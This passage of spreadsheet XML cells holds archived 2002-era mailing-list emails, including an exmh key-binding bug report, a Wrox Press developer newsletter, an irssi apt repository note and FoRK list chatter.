    <t>This is a multipart MIME message. --==_Exmh_9973050780 Content-Type: text/plain; charset=us-ascii Chris, I think you are referring to a problem I noticed last October (see  attached email). If I remember correctly, the binding for SeditBeautify is being applied outside of the sedit window and that results in the  behavior observed. Kevin In message &lt;1027546301.610.TMDA@deepeddy.vircio.com&gt;, Chris Garrigues writes: &gt;  &gt; Am I the only one for whom typing control-L to the main window causes this  &gt; error? &gt;  &gt; I can't figure out why it occurs. &gt;  &gt; Chris &gt;  --==_Exmh_9973050780 Content-Type: message/rfc822 ; name="5637" Content-Description: 5637 Content-Disposition: attachment; filename="5637" Return-Path: exmh-workers-admin@spamassassin.taint.org Delivery-Date: Tue, 02 Oct 2001 15:02:08 -0600 Received: from mhbs.lsil.com (mhbs.lsil.com [147.145.31.100]) 	by flytrap.co.lsil.com (8.9.3+Sun/8.9.1) with ESMTP id PAA14805 	for ; Tue, 2 Oct 2001 15:02:06 -0600 (MDT) Received: from mail2.lsil.com by mhbs.lsil.com with ESMTP for kchrist@lsil.com; Tue, 2 Oct 2001 14:02:04 -0700 Received: from listman.spamassassin.taint.org (listman.spamassassin.taint.org [199.183.24.211]) 	by mail2.lsil.com (8.9.3+Sun/8.9.1) with ESMTP id OAA15069 	for ; Tue, 2 Oct 2001 14:02:03 -0700 (PDT) Received: from listman.spamassassin.taint.org (localhost.localdomain [127.0.0.1]) 	by listman.redhat.com (Postfix) with ESMTP 	id DFA943002F; Tue,  2 Oct 2001 17:02:01 -0400 (EDT) Delivered-To: exmh-workers@listman.spamassassin.taint.org Received: from mail.spamassassin.taint.org (mail.spamassassin.taint.org [199.183.24.239]) 	by listman.redhat.com (Postfix) with ESMTP id 309802F422 	for ; Tue,  2 Oct 2001 17:01:02 -0400 (EDT) Received: (from mail@localhost) 	by mail.redhat.com (8.11.0/8.8.7) id f92L12F21878 	for exmh-workers@listman.redhat.com; Tue, 2 Oct 2001 17:01:02 -0400 Received: from mail2.lsil.com (mail2.lsil.com [147.145.40.22]) 	by mail.redhat.com (8.11.0/8.8.7) with ESMTP id f92L11g21859 	for ; Tue, 2 Oct 2001 17:01:01 -0400 Received: from mhbs.lsil.com (mhbs [147.145.31.100]) 	by mail2.lsil.com (8.9.3+Sun/8.9.1) with ESMTP id OAA14865 	for ; Tue, 2 Oct 2001 14:00:57 -0700 (PDT) From: kchrist@lsil.com Received: from inca.co.lsil.com by mhbs.lsil.com with ESMTP for exmh-workers@spamassassin.taint.org; Tue, 2 Oct 2001 14:00:22 -0700 Received: from flytrap.co.lsil.com (flytrap.co.lsil.com [172.20.3.234]) 	by inca.co.lsil.com (8.9.3/8.9.3) with ESMTP id PAA26097 	for ; Tue, 2 Oct 2001 15:00:21 -0600 (MDT) Received: from arrakis.co.lsil.com (arrakis [172.20.22.152]) 	by flytrap.co.lsil.com (8.9.3+Sun/8.9.1) with ESMTP id PAA14673 	for ; Tue, 2 Oct 2001 15:00:19 -0600 (MDT) Received: from arrakis (localhost [127.0.0.1]) 	by arrakis.co.lsil.com (8.9.1b+Sun/8.9.1) with ESMTP id PAA16677 	for ; Tue, 2 Oct 2001 15:00:17 -0600 (MDT) X-Mailer: exmh version 2.5 07/09/2001 with nmh-1.0.4+dev To: exmh-workers@spamassassin.taint.org Subject: SeditBeautify bug Reply-To: Kevin.Christian@lsil.com Message-Id: &lt;16675.1002056416@arrakis&gt; X-Loop: exmh-workers@spamassassin.taint.org Sender: exmh-workers-admin@spamassassin.taint.org Errors-To: exmh-workers-admin@spamassassin.taint.org X-BeenThere: exmh-workers@spamassassin.taint.org X-Mailman-Version: 2.0.1 Precedence: bulk List-Help:  List-Post:  List-Subscribe: , 	 List-Id: Discussion list for EXMH developers  List-Unsubscribe: , 	 List-Archive:  Date: Tue, 02 Oct 2001 15:00:16 -0600 MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit It appears that the binding for SeditBeautify applies to more than just the sedit window. Since SeditBeautify assumes we are in a sedit window the routine fails. (Try typing ctrl-l over the main window to see what I mean). The quick fix for this is to make the ^l more restrictive. However, I'd suggest keeping things the way the are and extending ^l to be a highlight toggle. If the window is currently highlighted (sedit or msg) re-display without highlighting and vice versa. While I can hack tcl, hacking tk is another story. Translation: I can't  fix this bug myself. Any volunteers? Kevin _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL] --==_Exmh_9973050780-- _______________________________________________ Exmh-workers mailing list Exmh-workers@redhat.com [URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>https://listman.redhat.com https://listman.redhat.com</t>
  </si>
  <si>
    <t>To: Flatware or Road Kill? &lt;FoRK@xent.com&gt;\nFrom: "Joseph S. Barrera III" &lt;joe@barrera.org&gt;\nDate: Wed, 24 Jul 2002 15:17:40 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 15:17:40 -0700</t>
  </si>
  <si>
    <t>"Joseph S. Barrera III" &lt;joe@barrera.org&gt;</t>
  </si>
  <si>
    <t>There are so many good musician jokes.\n\nA couple of my favorites:\n\nQ. What's the difference between a viola and a violin?\nA. A viola burns longer.\n\nQ. What's the definition of a minor second?\nA. Two oboes playing in unison.\n\n- Joe\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "'Karl Anderson'" &lt;kra@monkey.org&gt;, &lt;fork@spamassassin.taint.org&gt;\nFrom: "John Hall" &lt;johnhall@evergo.net&gt;\nDate: Wed, 24 Jul 2002 15:11:46 -0700</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 15:11:46 -0700</t>
  </si>
  <si>
    <t>"John Hall" &lt;johnhall@evergo.net&gt;</t>
  </si>
  <si>
    <t>"'Karl Anderson'" &lt;kra@monkey.org&gt;, &lt;fork@spamassassin.taint.org&gt;</t>
  </si>
  <si>
    <t>RE: [Baseline] Raising chickens the high-tech way</t>
  </si>
  <si>
    <t>My take: if genetic engineering includes selective breeding, then it also includes human pairs that are not randomly grouped. It doesn't matter if those two intend what they are doing, they are engaged in a 'selected sort'.  It has been brought up that a boss no longer marries his secretary.  Now the female law partner selects another high earning mate (at least associate law).  So instead of two couples making $140K a piece (100K + 40K) you have one pair with $200 and one pair with $80 and this has some interesting social effects.  And one of those effects is the difference in their children (on average). &gt; -----Original Message----- &gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com] On Behalf Of Karl &gt; Anderson &gt; Sent: Wednesday, July 24, 2002 1:15 PM &gt; To: fork@spamassassin.taint.org &gt; Subject: Re: [Baseline] Raising chickens the high-tech way &gt;  &gt; Elias Sinderson  writes: &gt;  &gt; &gt; Sorry, Karl, your confusing things. &gt;  &gt; No, it's just a silly discussion, but that's what picky semantic &gt; discussions turn into :) &gt;  &gt; &gt; Thos is saying that selective &gt; &gt; breeding should be counted as genetic engineering, whereas you are &gt; &gt; extending his definition to include the attration that your parents &gt; felt... &gt;  &gt; Yes, I'm saying that if he extends "genetic engineering" to include &gt; selecting animals to breed, he must extend it to include selecting &gt; people to breed with. &gt;  &gt; &gt; Unless your parents were selectively bred like livestock to produce you, &gt; &gt; I don't think you can make that case...  :-) &gt;  &gt; I'm saying that my parents selected each other, and that they did so &gt; because (among other reasons) each wanted the other's genes to be &gt; mixed with their own in the offspring that they were planning. &gt;  &gt; What does it matter that they were selecting to produce their own &gt; offspring, rather than the offspring of two unrelated animals? &gt;  &gt; -- &gt; Karl Anderson      kra@monkey.org [URL]http://www.monkey.org[/URL] &gt; [URL]http://xent.com[/URL] [URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://www.monkey.org http://xent.com http://xent.com</t>
  </si>
  <si>
    <t>To: "rODbegbie" &lt;rOD@arsecandle.org&gt;\nFrom: Christopher VanOosterhout &lt;chris@torresen.com&gt;\nDate: Wed, 24 Jul 2002 14:53:38 -0400</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 14:53:38 -0400</t>
  </si>
  <si>
    <t>Christopher VanOosterhout &lt;chris@torresen.com&gt;</t>
  </si>
  <si>
    <t>unsubscribe At 12:26 PM 7/24/02 -0400, rODbegbie wrote: &gt;Tabor J. Wells wrote: &gt; &gt; And where does it say production-ready? [URL]http://razor.sourceforge.net[/URL] &gt; &gt; says at the top of the page: &gt; &gt; &gt; &gt; June 13, 2002 - Vipul's Razor v2 released! The first beta of Vipul's &gt; &gt; Razor v2 is now available for public download. &gt; &gt;1)  I think the code is still very much pre-beta. &gt; &gt;2)  When you go to the "Download" page, it tells you "Fetch the latest &gt;versions of razor-agents and razor-agents-sdk packages"  It is not at all &gt;clear that these are development packages. &gt; &gt;The site is badly designed, and very misleading.  IMO.  The fact that the &gt;word "beta" appears in the middle of some introductory text on the front &gt;page is hardly a valid argument.  (Well accepted software design "fact": &gt;USERS DON'T READ *ANYTHING*) &gt; &gt;I get the impression that Vipul &amp; co are deliberately trying to mislead &gt;users into downloading the dev code in order to get more unwitting test &gt;sites. &gt; &gt;But that's just my opinion, I could be wrong. &gt; &gt;rOD. &gt; &gt;-- &gt;Anyway... long story short... &gt;...is a phrase whose origins are complicated and rambling. &gt; &gt; &gt;&gt; Doing the blogging thang again at [URL]http://www.groovymother.com[/URL] &lt;&lt; &gt; &gt; &gt; &gt;------------------------------------------------------- &gt;This sf.net email is sponsored by:ThinkGeek &gt;Welcome to geek heaven. &gt;[URL]http://thinkgeek.com[/URL] &gt;_______________________________________________ &gt;Razor-users mailing list &gt;Razor-users@lists.sourceforge.net &gt;[URL]https://lists.sourceforge.net[/URL] -- Christopher VanOosterhout Torresen Marine, Inc. Internet Division [URL]http://www.torresen.com[/URL] [URL]http://www.marinedieseldirect.com[/URL] 3126 Lake Shore Drive Muskegon, Michigan 49441 231-759-8596 ------------------------------------------------------- This sf.net email is sponsored by:ThinkGeek Welcome to geek heaven. [URL]http://thinkgeek.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://razor.sourceforge.net http://www.groovymother.com http://thinkgeek.com https://lists.sourceforge.net http://www.torresen.com http://www.marinedieseldirect.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: "Developers Journal" &lt;developers_journal@p2p.wrox.com&gt;\nFrom: &lt;journal@wrox.com&gt;\nDate: Wed, 24 Jul 2002 14:42:38 +0100</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 14:42:38 +0100</t>
  </si>
  <si>
    <t>&lt;journal@wrox.com&gt;</t>
  </si>
  <si>
    <t>"Developers Journal" &lt;developers_journal@p2p.wrox.com&gt;</t>
  </si>
  <si>
    <t>Wrox Press Developer's Journal</t>
  </si>
  <si>
    <t>This is a multi-part message in MIME format. ------Multipart-Boundary-xx5UNseljF43o--- Content-Type: text/plain; 	charset="iso-8859-1" Content-Transfer-Encoding: 7bit ***WROX PRESS DEVELOPER'S JOURNAL*** Programmer to Programmer(TM) [URL]http://www.wrox.com[/URL] 7/26/02 ========== IN THIS ISSUE ========== TITLE OF THE MONTH GEMS FROM THE CATALOGUE RECENTLY RELEASED FUTURE TITLES NEWS &amp; FEATURES WROX ANNOUNCEMENTS OTHER ANNOUNCEMENTS INFORMATION FOR SUBSCRIBERS ========== TITLE OF THE MONTH ========== ASP.NET Namespace Reference with C# [URL]http://www.wrox.com[/URL] Introduction System.Web System.Web.UI System.Web.UI.HtmlControls System.Web.UI.WebControls System.Web.UI.MobileControls System.Web.Caching System.Web.Configuration System.Web.Security System.Web.Services System.Web.Services.Description System.Web.Services.Protocols Data in ASP.NET XML in ASP.NET  Also available: ASP.NET 1.0 Namespace Reference with VB.NET [URL]http://www.wrox.com[/URL] ========== GEMS FROM THE CATALOGUE ========== Professional Linux Programming [URL]http://www.wrox.com[/URL] Introduction Chapter 1: Application Design Chapter 2: Concurrent Versions System (CVS) Chapter 3: Databases Chapter 4: PostgreSQL interfacing Chapter 5: MySQL Chapter 6: Tackling Bugs Chapter 7: LDAP Directory Services Chapter 8: GUI programming with GNOME/GTK+ Chapter 9: GUI Building with Glade and GTK+/GNOME Chapter 10: Flex and Bison Chapter 11: Testing Tools Chapter 12: Secure Programming Chapter 13: GUI programming with KDE/Qt Chapter 14: Writing the dvdstore GUI using KDE/Qt Chapter 15: Python Chapter 16: Creating Web interfaces with PHP Chapter 17: Embedding and extending Python with C/C++ Chapter 18: Remote Procedure Calls Chapter 19: Multi-media and Linux Chapter 20: CORBA. Chapter 21: Implementing CORBA with ORBit Chapter 22: Diskless systems Chapter 23: XML and libxml Chapter 24: Beowulf Clusters Chapter 25: Documentation Chapter 26: Device Drivers Chapter 27: Distributing the application Chapter 28: Internationalization ========== RECENTLY RELEASED ========== ASP.NET Namespace Reference with C# [URL]http://www.wrox.com[/URL] ASP.NET Namespace Reference with VB.NET [URL]http://www.wrox.com[/URL] Beginning ASP.NET Databases using C# [URL]http://www.wrox.com[/URL] Beginning C# Databases [URL]http://www.wrox.com[/URL] ***Visit the P2P Discussion list for Beginning C# Databases [URL]http://p2p.wrox.com[/URL] Developing C# Windows Software: A Windows Forms Tutorial [URL]http://www.wrox.com[/URL] Professional ASP.NET XML using C# [URL]http://www.wrox.com[/URL] Professional Open Source Web Services [URL]http://www.wrox.com[/URL] Visual Basic .NET Solutions Toolkit: Practical Classes for .NET Developers [URL]http://www.wrox.com[/URL] ========== FUTURE TITLES ========== Beginning VB.NET 2nd Edition [URL]http://www.wrox.com[/URL] 	 Beginning .NET Web Services with VB.NET [URL]http://www.wrox.com[/URL] Professional VB.NET Design Patterns [URL]http://www.wrox.com[/URL] Fast Track ADO.NET [URL]http://www.wrox.com[/URL] ASP.NET Security [URL]http://www.wrox.com[/URL] ***Visit the P2P Discussion list for ASP.NET Security [URL]http://p2p.wrox.com[/URL] Fast Track Windows Forms [URL]http://www.wrox.com[/URL] Professional ASP.NET Web Services with VB.NET [URL]http://www.wrox.com[/URL] VB.NET Code Level Security Handbook [URL]http://www.wrox.com[/URL] VB.NET Remoting Handbook [URL]http://www.wrox.com[/URL] VB.NET Deployment Handbook [URL]http://www.wrox.com[/URL] ========== NEWS &amp; FEATURES  ========== ASPToday announces their Inaugural Guru week ***Dan Wahlin expounds on XML Support in ASP.NET ASPToday are proud to announce their first Guru Week. From 29th July to 2nd August Microsoft MVP, ASPToday author and [URL]www.xmlforasp.net[/URL] founder Dan Wahlin presents a series of specially commissioned articles, telling you all you need to know about XML support in ASP.NET. Drawing on his experience of consulting and XML training, Dan's articles will allow anyone interested in XML to quickly get up to speed in this important subject. Read more about ASPToday's Guru Weeks: [URL]http://www.wrox.com[/URL] ***Updating Data Safely with A DataSet, by Alex Homer OK, so we cant store all three values for a row (the current, original and the underlying values) in the tables of our DataSet. Is this actually important? What do we actually need to perform the process, and what do users actually expect to see? Can we make do with just two values instead of three, (and dont you hate books that keep asking questions)? Read the rest of Alex Homer's article here: [URL]http://www.wrox.com[/URL] ========== WROX ANNOUNCEMENTS ========== Author Interviews ***With Franois Liger, Craig McQueen and Paul Wilton, authors of Visual Basic .NET Text Manipulation Handbook. [AP] What do you think this book brings to the Visual Basic .NET developer, and so who do you think needs this book? [CM] The book provides a quick easy reference for string programming tasks. String manipulation is a large part of programming and it is difficult to remember it all. Having an accessible reference assists in finding existing code to do the job rather than rewriting something that is already in the platform. It's valuable for all .NET developers. [PW] I think all VB.NET developers need this book. String handling and regular expressions are not arcane topics for high-flying gurus - they are the stuff of everyday programming! The regular expression chapters give a great insight into what at first can seem a tricky topic. In addition the regular expression reference at the back of the book is worth its weight in gold - certainly more readable than all the documentation I had to work with when writing the book. [AP] In two sentences, explain what strings are in .NET.  Read the interview in full: [URL]http://www.wrox.com[/URL] Or read about Visual Basic .NET Text Manipulation Handbook: [URL]http://www.wrox.com[/URL] ***With Tobin Titus, author of Visual Basic .NET Threading Handbook In June, Wrox brought out a slim 260-page volume on threading in VB.NET. There has been some confusion as to why we would want to bring a book out on what seems a straightforward topic. In this article we interview Tobin Titus (one of the authors on this title) and ask him various questions on the book, as well getting his opinions on various programming-related topics. What is free threading?  Free threading is the ability to control execution to the utmost within an application. While VB developers have been able to control some aspects of threading in the past, they haven't been completely free to control those threads in the manner that they desire. Free threading allows the developer to make decisions on when a thread should start, when it should end, and what it should do while executing. Read the interview in full here: [URL]http://www.wrox.com[/URL] Or read about Visual Basic .NET Threading Handbook: [URL]http://www.wrox.com[/URL] ***C#Today Free Code Download Due to customer feedback, C#Today have decided to try out something new this week - we are making this week's code  download \ support material available to all non-subscribers (providing they are a member of the Wrox Developer Community, which is free to join). This week's case study: Generating Design Patterns Using CodeDOM  [URL]http://www.csharptoday.com[/URL] The Code Document Model (CodeDOM), which provides the ability to generate source code in a number of the managed languages, is a very powerful .NET facility and has attracted much interest. Within Visual Studio .NET, a complementary though unrelated feature is provided by the CodeModel object, which allows programmatic access to hand-written code. Together these two tools provide a platform from which it should be possible to develop a VS.NET add-in to streamline the production of common designs in code. This case study follows the development of such a tool, which attempts to automate the generation of a widespread design pattern in an existing C# or VB.NET project. ***Get on the Fast Track to Success If you are an experienced programmer who needs to get up to speed on core .NET Technologies as quickly as possible, the Fast Track series is for you. The Fast Track books complement our Beginning and Professional series by providing concise guides to core topics. They deliver the essential facts and understanding that are required to start taking advantage of .NET. By targeting specific groups of experienced developers, the books are able to concentrate on providing valuable information rather than covering basics. Read the full article here: [URL]http://www.wrox.com[/URL] ========== INFORMATION FOR SUBSCRIBERS ========== You can unsubscribe from this list by visiting [URL]http://www.wrox.com[/URL] Enter your e-mail address into the field at the bottom of the page and press the unsubscribe button. The page will refresh and you will see a short message above the field to tell you if you have successfully unsubscribed. Similarly, to change the address that the Developers Journal is mailed to, enter your previous address and click unsubscribe, then enter your new address and click subscribe. Replying to this mail, however, will NOT automatically take your address off our lists. We'd like to hear from you. Please send all comments regarding the Developer's Journal to Emma at DJ@wrox.com. Comments about Wrox books should be sent to feedback@wrox.com.  Technical support relating to Wrox books is available at support@wrox.com. Wrox - Programmer to Programmer(TM): [URL]http://www.wrox.com[/URL] ------Multipart-Boundary-xx5UNseljF43o--- Content-Type: text/html; 	charset="iso-8859-1" Content-Transfer-Encoding: 7bit Wrox Press Developers Journal Programmer to Programmer TM If you would prefer to receive plain text, please let us know:  editorialteam@wrox.com?subject=plain_text_mail Wrox Press Developer's Journal .NET Special Programmer to Programmer TM [URL]www.wrox.com[/URL] 7/26/02 IN THIS ISSUE TITLE OF THE MONTH GEMS FROM THE CATALOGUE RECENTLY RELEASED FUTURE TITLES NEWS &amp; FEATURES WROX ANNOUNCEMENTS OTHER ANNOUNCEMENTS INFORMATION FOR SUBSCRIBERS TITLE OF THE MONTH ASP.NET Namespace Reference with C# [URL]http://www.wrox.com[/URL] Table of Contents Introduction System.Web System.Web.UI System.Web.UI.HtmlControls System.Web.UI.WebControls System.Web.UI.MobileControls System.Web.Caching System.Web.Configuration System.Web.Security System.Web.Services System.Web.Services.Description System.Web.Services.Protocols Data in ASP.NET XML in ASP.NET *Also available ASP.NET Namespace Reference with VB.NET [URL]http://www.wrox.com[/URL] Top GEMS FROM THE CATALOGUE Professional Linux Programming [URL]http://www.wrox.com[/URL] Table of Contents Introduction Chapter 1: Application Design Chapter 2: Concurrent Versions System (CVS) Chapter 3: Databases Chapter 4: PostgreSQL interfacing Chapter 5: MySQL Chapter 6: Tackling Bugs Chapter 7: LDAP Directory Services Chapter 8: GUI programming with GNOME/GTK+ Chapter 9: GUI Building with Glade and GTK+/GNOME Chapter 10: Flex and Bison Chapter 11: Testing Tools Chapter 12: Secure Programming Chapter 13: GUI programming with KDE/Qt Chapter 14: Writing the dvdstore GUI using KDE/Qt Chapter 15: Python Chapter 16: Creating Web interfaces with PHP Chapter 17: Embedding and extending Python with C/C++ Chapter 18: Remote Procedure Calls Chapter 19: Multi-media and Linux Chapter 20: CORBA. Chapter 21: Implementing CORBA with ORBit Chapter 22: Diskless systems Chapter 23: XML and libxml Chapter 24: Beowulf Clusters Chapter 25: Documentation Chapter 26: Device Drivers Chapter 27: Distributing the application Chapter 28: Internationalization Top RECENTLY RELEASED (click for more information) ASP.NET 1.0 Namespace Reference with C# ASP.NET 1.0 Namespace Reference with VB.NET Beginning ASP.NET Databases using C# Beginning C# Databases (Join the p2p discussion list for this title here) Professional Open Source Web Services Developing C# Windows Software: A Windows Forms Tutorial Professional ASP.NET 1.0 XML using C# Visual Basic .NET Solutions Toolkit FUTURE TITLES (click for more information) Beginning VB.NET, 2nd Edition Beginning .NET Web Services with VB.NET Professional VB.NET Design Patterns Fast Track ADO.NET ASP.NET Security (Join the p2p discussion list for this title here) Fast Track Windows Forms Professional ASP.NET Web Services with VB.NET VB.NET Code Level Security Handbook VB.NET Remoting Handbook VB.NET Delpoyment Handbook Top NEWS &amp; FEATURES ASPToday announces their Inaugural Guru Week - Dan Wahlin expounds on XML Support in ASP.NET ASPToday are proud to announce their first Guru Week. From 29th July to 2nd August Microsoft MVP, ASPToday author and [URL]www.xmlforasp.net[/URL] founder  Dan Wahlin presents a series of specially commissioned articles, telling you all you need to know about XML support in ASP.NET. Drawing on his  experience of consulting and XML training, Dan's articles will allow anyone interested in XML to quickly get up to speed in this important subject. Read more about ASPToday's Guru Weeks: [URL]http://www.wrox.com[/URL] Subscription to ASPToday starts at $10 per month: subscribe Now. Alternatively, you can purchase any article in our library for $5. Updating Data Safely with a DataSet, an article by  Alex Homer "OK, so we cant store all three values for a row (the current, original and the underlying values) in the  tables of our DataSet. Is this actually important? What do we actually need to perform the process, and  what do users actually expect to see? Can we make do with just two values instead of three, (and dont  you hate books that keep asking questions)?" Read the whole of Alex Homer's article here: [URL]http://www.wrox.com[/URL] Top WROX ANNOUNCEMENTS AUTHOR INTERVIEWS - With Franois Liger, Craig McQueen and Paul Wilston,  authors of Visual Basic .NET Text Manipulation Handbook Q. What do you think this book brings to the Visual Basic .NET developer, and so who do you think needs this book? [CM] The book provides a quick easy reference for string programming tasks. String manipulation is a  large part of programming and it is difficult to remember it all. Having an accessible reference assists in finding existing code  to do the job rather than rewriting something that is already in the platform. It's valuable for all .NET developers. [PW] I think all VB.NET developers need this book. String handling and regular expressions are  not arcane topics for high-flying gurus - they are the stuff of everyday programming! The regular expression chapters give a  great insight into what at first can seem a tricky topic. In addition the regular expression reference at the back of the book  is worth its weight in gold - certainly more readable than all the documentation I had to work with when writing the book. [AP] In two sentences, explain what strings are in .NET  Read the interview in full: [URL]http://www.wrox.com[/URL] Or read about Visual Basic .NET Threading Handbook: [URL]http://www.wrox.com[/URL] - with Tobin Titus, author of  Visual Basic .NET Threading Handbook In June, Wrox brought out a slim 260-page volume on threading in VB.NET. There has been some confusion as to why we would want to bring a book out on what  seems a straightforward topic. In this article we interview Tobin Titus (one of the authors on this title) and ask him various questions on the book, as  well getting his opinions on various programming-related topics. Q. What is free threading?  Free threading is the ability to control execution to the utmost within an application. While VB developers have been able to control some aspects of  threading in the past, they haven't been completely free to control those threads in the manner that they desire. Free threading allows the developer  to make decisions on when a thread should start, when it should end, and what it should do while executing.  Read the interview in full here: [URL]http://www.wrox.com[/URL] Or read about Visual Basic .NET Threading Handbook: [URL]http://www.wrox.com[/URL] Get on the Fast Track to Success If you are an experienced programmer who needs to get up to speed on core .NET Technologies as quickly as possible, the Fast Track series is for you.  The Fast Track books complement our Beginning and Professional series by providing concise guides to core topics. They deliver the essential facts and  understanding that are required to start taking advantage of .NET. By targeting specific groups of experienced developers, the books are able to  concentrate on providing valuable information rather than covering basics.  Read the full article here: [URL]http://www.wrox.com[/URL] C#Today Free Code Download Due to customer feedback, C#Today have decided to try out something new this week - we are making this week's code  download \ support material available to all non-subscribers  (providing they are a member of the Wrox Developer Community, which is free to join). This week's case study: Generating Design Patterns Using CodeDOM [URL]http://www.csharptoday.com[/URL] The Code Document Model (CodeDOM), which provides the ability to generate source code in a number of the managed languages, is a very powerful .NET facility and has  attracted much interest. Within Visual Studio .NET, a complementary though unrelated feature is provided by the CodeModel object, which allows programmatic access to  hand-written code. Together these two tools provide a platform from which it should be possible to develop a VS.NET add-in to streamline the production of common designs  in code. This case study follows the development of such a tool, which attempts to automate the generation of a widespread design pattern in an existing C# or VB.NET project. There are four new lists in the .NET category on p2p: beginning_c_sharp_databases Connecting your C# code to data sources aspx_web_matrix Discuss Web Matrix, a free application development tool for ASP.NET weo_object_builder Generate code in C# or VB.NET for SQL Server regular_expressions Principles and use of Regular Expressions Top INFORMATION FOR SUBSCRIBERS You can unsubscribe from this list by visiting [URL]http://www.wrox.com[/URL] Enter your e-mail address into the field at the bottom of the page and press the unsubscribe button. The page will refresh and you will see a short message above the field to tell you if you have successfully unsubscribed. Similarly, to change the address that the Developers Journal is mailed to, enter your previous address and click unsubscribe, then enter your new address and click subscribe. Replying to this mail, however, will NOT automatically take your address off our lists. We'd like to hear from you. Please send all comments regarding the Developer's Journal to Vera at mailto:DJ@wrox.com Comments about Wrox books should be sent to mailto:feedback@wrox.com Technical support relating to Wrox books is available at mailto:support@wrox.com Top Wrox - Programmer to Programmer [URL]www.wrox.com[/URL] ------Multipart-Boundary-xx5UNseljF43o-----</t>
  </si>
  <si>
    <t>http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://p2p.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://p2p.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com www.xmlforasp.net http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.csharptoday.com http://www.wrox.com http://www.wrox.com http://www.wrox.com www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com www.xmlforasp.net http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.wrox.com http://www.csharptoday.com http://www.wrox.com www.wrox.com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Harri Haataja &lt;harri.haataja@smilehouse.com&gt;\nDate: Wed, 24 Jul 2002 14:38:14 +0300</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 14:38:14 +0300</t>
  </si>
  <si>
    <t>Harri Haataja &lt;harri.haataja@smilehouse.com&gt;</t>
  </si>
  <si>
    <t>Re: apt repository for irssi</t>
  </si>
  <si>
    <t>On Wed, Jul 24, 2002 at 12:18:27AM +0200, Roy-Magne Mo wrote: &gt; Seems like irssi.org also has an apt-rpm repository for snapshots of &gt; irssi: &gt;  &gt; rpm [URL]http://ninja.no[/URL] 7.3/i386 irssi &gt; rpm-src [URL]http://ninja.no[/URL] 7.3/i386 irssi Maybe sf.net should provide automated (how much more automated can it get? Well, maybe automatic one-click setup and instructions for those who can't read manuals and a place in which to drop gpg keys) apt-rpm (and maybe apt-deb though debian seems to package most stuff anyway) repositories. If it was one big repository for "stable" releases and each could have their own for "development" or "testing" releases. You handled your own repo and they did a nightly stable update for example. Also it should check that no-one can manage to put in a package with the same name as another one or otherwise sabotage the thing. (hmm, and I suppose the good sigmonster may deserve a cookie, too..) --  Last time I was stoned, I tried to eat an airport. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://ninja.no http://ninja.no http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Wed, 24 Jul 2002 14:27:11 -0400 (EDT)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 14:27:11 -0400 (EDT)</t>
  </si>
  <si>
    <t>USA USA WE ARE NUMBER ....six.</t>
  </si>
  <si>
    <t>[URL]http://news.bbc.co.uk[/URL]\n\n\n\n"Around the world, there is a growing sense that democracy has not\ndelivered development" Sakiko Fukuda-Parr UN report author\n\nHDI rank 2002    LifeEXp InfantMort/1000  GDP$percapita  AdultLit%\n1 Norway           78.5      4               29,918       99%*\n2 Sweden           79.7      3               24,277       99%*\n3 Canada           78.8      6               27,840       99%*\n4 Belgium          78.4      6               27,178       99%*\n5 Australia        78.9      6               25,693       99%*\n6 United States    77        7               34,142       99%*\n7 Iceland          79.2      4               29,581       99%*\n8 Netherlands      78.1      5               25,657       99%*\n9 Japan            81        4               26,755       99%*\n10 Finland         77.6      4               24,996       99%*\n\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://news.bbc.co.uk http://xent.com</t>
  </si>
  <si>
    <t>To: Jim Whitehead &lt;ejw@cse.ucsc.edu&gt;\nFrom: Eugen Leitl &lt;eugen@leitl.org&gt;\nDate: Wed, 24 Jul 2002 14:18:51 +0200 (CEST)</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 14:18:51 +0200 (CEST)</t>
  </si>
  <si>
    <t>Jim Whitehead &lt;ejw@cse.ucsc.edu&gt;</t>
  </si>
  <si>
    <t>Re: SimPastry</t>
  </si>
  <si>
    <t>On Tue, 23 Jul 2002, Jim Whitehead wrote:\n\n&gt; You can download a Pastry simulator off of this web site.\n\nWhy should I download anything from Microsoft? My firstborn is my and my \nalone. No technology is worth that price. (And since when is Redmond into \ntechnology? Weather reports from Dis are so far unchanging).\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: iiu-admin@taint.org\nFrom: iiu-admin@taint.org\nDate: Wed, 24 Jul 2002 14:03:01 +0100</t>
  </si>
  <si>
    <t>Wed, 24 Jul 2002 14:03:01 +0100</t>
  </si>
  <si>
    <t>IIU post from friendsworld@lovefinder.com requires approval</t>
  </si>
  <si>
